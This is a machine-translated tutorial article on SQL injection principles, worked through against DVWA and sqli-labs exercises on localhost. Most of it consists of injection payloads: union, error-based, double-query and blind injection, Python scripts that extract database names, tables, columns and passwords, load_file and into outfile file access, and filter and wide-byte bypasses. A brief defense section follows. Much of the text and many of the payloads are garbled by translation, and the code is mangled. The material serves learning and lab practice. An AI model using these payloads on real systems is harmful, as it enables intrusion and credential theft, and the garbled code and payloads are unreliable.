Shulou(Shulou.com)06/01 Report--

This article introduces the relevant knowledge of "what is the principle of SQL injection". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Factors causing 0x01.SQL injection

(1) lack of strict verification (2) malicious modification (3) spliced and executed successfully

0x02. The method to detect the existence of injection:

1. Determine whether there is injection (to determine whether there is no strict verification), and what type of injection

(1) whether the change of controllable parameters can affect the display result of the page.

(2) whether the input sql statement can report an error-you can see some traces of the statement through the error report in the database.

(3) whether the input sql statement can not report an error-- the statement can be closed successfully

two。 Whether the statement can be maliciously modified

3. Whether it can be successfully implemented

4. Get the data you want

Brief description of 0x03.SQL injection types 1. Boolean query

Or query: field values can be found in the definition table

2.union query

(1) guess the number of fields (select 1, 2 and 3.... Or order by 1 Magna order by 3... It's all a mistake in reading the newspaper.

(2) how to get library name, table name and field name

(3) the question of authority

3.information_schema (database dictionary) information_schema this database holds information about all databases on the MySQL server. Such as the name of the database, the table of the database, the data type and access of the table column, etc. To put it more simply, on this MySQL server, what databases are there, what tables are in each database, what is the field type of each table, what permissions are required for each database to access, and so on, the information is stored in information_schema. Column schema_name in information_schema.schemata records the names of all databases, column table_schema in information_schema.tables records the names of all databases, column information_schema.tables records the names of tables in all databases, column table_schema in information_schema.columns records the names of all databases, table_name records the names of tables in all databases, table_name records the names of tables in all databases. The column column_name records the names of the columns of tables in all databases

MySQL version 5. 0 does not have the information_schema system table, cannot list names, etc., and can only run table names violently.

Below 5.0 is multi-user single operation, and above 5.0 is multi-user multi-operation.

Example: select concat (table_name) from information_schema.tables where table_schema=database ()

4. Manual injection

(1) error-based injection: judging the injection point? Single quotation marks?

(2) Boolean-based injection: close the previous sql statements and construct logical statements for or and and, which are used to annotate all subsequent statements.

(3) union-based injection:

User (): current user name database (): current database name version (): database version information 'union select 1 database schema from information_schema.tables-- hh # look up the library name' union select 1 database name from information_shcema.tables where table_schema= '... "# check all tables in the previous database' union select 1 Column_name from information_schema.columns where table_name= "..." # check all the fields in the previous table # concat to implement field splicing 'union select user,concat (first_name,'', last_name,'', password) from users -'# group_concat#concat_ws5. Error injection `(1) extractvalue (xml_document,Xpath_string) returns the string ``(2) Updatexml (xml_document,Xpath_string,new_value) containing the queried value from the target XML. The injection error point is at the Xpath_string location, so other locations can be handled at will, such as writing 1.`.

DVWA Security='low':

1 'and updatexml (1 and updatexml (0x7e, (select group_concat (schema_name) from information_schema.schemata), 0x7e), 1) # hexadecimal ASCII code 1' and updatexml (0x7e, (select group_concat (table_name) from information_schema.tables where table_schema='dvwa'), 0x7e), 1) # 1 'and updatexml (0x7e, (select group_concat (column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'), 0x7e) 1) # 1 'and updatexml (1 and updatexml concat (0x7e, (select group_concat (user_id,last_name) from users), 0x7e), 1) #

Where:

XML_document is in string format and is the name of the XML document object

Xpath_string (string in Xpath format), autonomous learning.

New_value,string format, replacing the found eligible data

6. Double injection (double query error injection, two select)

Principle: use group by primary key conflict to report errors to obtain database information.

Several functions:

Floor () # rounding down rand () # returns (0prime1) random value Rand () * 2 returns (0Power2) random value floor (rand () * 2) # rounding down returns a value of 0 or 1. Group by # grouping count () # returns all the records of the current table

For example:

Sqli-labs Less-11 (payload)

Uname=admin' union select 1 count (1) from information_schema.tables group by group_concat (floor (rand () * 2), (select table_name from information_schema.tables where table_schema='security'))% 23&passwd=1237. Boolean blind injection

Normal injection cannot directly echo error messages.

Like time blind injection, only one character is judged at a time.

? id=1' and substr (database (), 1) = 1 #

Example:

Sqli-labs Less-6

Only two results are returned for this level, which returns "You are in..." when the query exists, otherwise it is empty.

? id=1' and 1-+ echo You are in.

? id=1' and 1 # 2-+ do not echo

In this case, the substr () function can judge one character at a time, and the python script does Boolean blind injection, as follows:

Import requestss = requests.Session () url = 'http://localhost:8080/sqli-labs/Less-6/'payloads =' AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz [{\ |]} ^ ~, 'data =' 'for i in range (50): for j in payloads: payload = f "? id=1\" and substr (binary database (), {I} 1) ='{j}'% 23 "# payload = f"? id=1\ "and substr ((select binary group_concat (table_name) from information_schema.tables where table_schema=database ()), {I}, 1) ='{j}'% 23" # payload = f "? id=1" and substr ((select binary group_concat (column_name) from information_schema.columns where table_name='users'), {I} 1) ='{j}'23 "# payload = f"? id=1 "and substr ((select binary group_concat (password,'') from security.users), {I}, 1) ='{j}'23" if "You are in." In s.get (url+payload). Text: data + = j break print (data) 8. Time Blind? id=1' union select (if (substr (database (), 1Pol 1)) > 1 substr sleep (3), 1) # there is also the bench () function.

Example:

Sqli-labs Less-9

You can find here that only You are in is echoed regardless of whether the query is right or wrong.

Test? id=1' and sleep (3)% 23 page will be delayed for 3 seconds and then echoed, which is judged to be time blind.

Write a script for time blind injection, as follows:

Import requestsurl = 'http://localhost:8080/sqli-labs/Less-9/'payloads =' AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz [{\ |]} ^ ~, 'data =' 'for i in range (50): for j in payloads: payload = f "? id=1' and if ((substr (binary database (), {I}, 1) =' {j}'), sleep (1), 1)% 23" # wait 1 second when correct If incorrect, return # payload = f "? id=1' and if ((substr ((select binary group_concat (table_name) from information_schema.tables where table_schema=database ()), {I}, 1) ='{j}'), sleep (1), 1)% 23" # payload = f "? id=1' and if ((substr ((select binary group_concat (column_name) from information_schema.columns where table_name='users'), {I}) 1) ='{j}'), sleep (1), 1)% 23 "try: r = requests.get (url+payload, timeout=1) except Exception: data + = j print (data) break9.cookie injection

The injection location is at the cookie of the http request

10.HTTP-Referer injection

The injection location is at the Referer of the http request

11.SQL injection to read files

Load_file (filename): reads the file and returns the contents of the modified file as a string.

Conditions of use:

a. Must have permission to read and the file must be fully readable

b. To read the file must be on the server

c. You must specify the full path to the file (absolute path)

d. The size of the file to be read must be less than max_allowed_packet

Example:

? id=-1' union select 1 phpstudy_pro 2 index.php file ("D:\\ phpstudy_pro\\ WWW\\ sqli-labs\\ Less-1\\ index.php")-- + movie

Write file (into outfile):

? id=-1' union select 1 WWW 2 into outfile "D:\\ phpstudy_pro\\ WWW\\ sqli-labs\\ Less-1\\ index.php"-- +

Example:

Sqli-labs Less-7

The test found that id=1' reported an error, but commented out the following statement and threw the error, and closed parentheses, found that adding two parentheses was judged to be (('$id')) closed, and then Use outfile according to the prompt. You should be using the export statement.

(1) first of all, judge whether you have the authority:

Id=1')) and (select count (*) from mysql.user) > 0-- +

There is no error, with root permission.

(2) so you can export the data and export all the tables:

? id=-1')) union select 1 from information_schema.tables where table_schema=database 2, (select group_concat (table_name) from information_schema.tables where table_schema=database ()) into outfile "D:\\ phpstudy_pro\\ WWW\\ sqli-labs\\ Less-7\\ result.txt"-- +

(3) Export all column names in the user table:

? id=-1') union select 1 from information_schema.columns where table_name='users' 2, (select group_concat (column_name) from information_schema.columns where table_name='users') into outfile "D:\\ phpstudy_pro\\ WWW\\ sqli-labs\\ Less-7\\ result.txt"-- +

(4) Export username and password

? id=-1') union select 1 from users 2, (select group_concat (username,password) from users) into outfile "D:\\ phpstudy_pro\\ WWW\\ sqli-labs\\ Less-7\\ result.txt"-- +

Note: in Mysql, you need to pay attention to the problem of path escape, that is, separated by double slashes.

11. Bypass

(1)。 Bypass comment character filtering (#,-- +)

Example: Sqli-labs Less-13

Method one (error injection)? id=1' or (extractvalue (1magnum concat (0x7e from information_schema.tables where table_schema=database version () or'? id=1' or (extractvalue (1jie concat (0x7e, (select group_concat (table_name) from information_schema.tables where table_schema=database () or') method two (close the following content)? id=' union select 1jurisdiction.

(2)。 Bypass and-or filtering

01. Case bypass:

Several forms of or (Or,oR,OR, | |) several forms of and (And,...,&&) # case-sensitive can be used

02. Double write bypass

? id=1' oorrder by 1-- + can also be used to judge the number of echo columns:? id=1' union select 1, 2, and 3. # (slow to try one by one) and then use error injection:? id=-1' oorr extractvalue (1 id=-1' oorr extractvalue concat (0x7e database ()-- + # (get the current database name) or use:? id=-1' | | extractvalue (1 concat (0x7e database ()-+ (3). Bypass spaces to filter other characters instead:% 09 TAB key (horizontal)% 0a new line TAB key (vertical) new page% 0d return function% a0 spaces / * * / replace spaces? id=1' or (content) or (content)'# a form of injection

(4)。 Inline comment filtering

Shaped like / *! (keywords) * /

Example:

/ *! Anglo-Placement Universe selecthands /

(5)。 Special character escape and wide byte injection

There are three ways to escape special characters:

(1) Custom escape function

Function check_addslashes ($string) {$string = preg_replace ('/'. Preg_quote ('\'). /', "\", $string); / / escape any backslash $string = preg_replace ('/\'/ iTunes,'\\', $string); / / escape single quote with a backslash $string = preg_replace ('/\ "/',"\\ ", $string); / / escape double quote with a backslash return $string;}

(2) call the function addslashes ()

(3) call the function mysql_real_escape_string ()

All of these methods may be bypassed by wide byte injection

Analysis of the principle of wide byte injection:

Take the single quotation mark, for example, which is escaped as', our goal is to get rid of the backslash and escape. Now we do not enter', but enter% df', after it is escaped, it becomes:% df', is also equivalent to% df%5c%27 (% 5c represents backslash\), and then due to the use of GBK multibyte encoding,% df%5c will be converted into Chinese character "gbk" before the database query, thus making% 27, that is, single quotation marks escape.

The difference between wide-byte injection and normal injection payload is that the escaped character is eaten by adding% df,'' to the character that will be escaped. Of course, it doesn't have to be% df here, as long as (the filled character +% 5c) is in GBK encoding, you can make the escaped character escape, followed by subsequent injection.

Example: Sqli-labs Less-32

Payload1:?id=1'

You can see that the single quotation marks here have been escaped

Payload2:?id=1%df'

Root cause:

Character_set_client (the character set of the client) is different from character_set_connection (the character set of the connection layer), or conversion functions such as iconv and mb_convert_encoding are improperly used.

Solution:

Unified database, Web applications, operating systems used by the character set, to avoid differences in parsing, it is best to set to UTF-8. Or correctly escape the data, such as the use of mysql_real_escape_string+mysql_set_charset.

(6)。 Secondary injection

(7)。 Filter function bypass

0x04.SQL injection defense

(1) Code layer

01. Blacklist 02. Whitelist 03. Sensitive character filter 04. Use the framework security query 05. Standard output

(2) configuration layer

01. Open GPC02. Use UTF-8

(3) physical layer

01.WAF02. Database audit 03. Cloud Protection 04.IPS (intrusion Prevention system) 01. Use secure API02. The input special characters are escaped by Escape 03. Use whitelist to standardize input verification method 04. Control the client input, do not allow input SQL injection related special characters 05. 5. The server filters, escapes, replaces and deletes special characters before submitting the database for SQL query. This is the end of the introduction of "what is the principle of SQL injection". Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.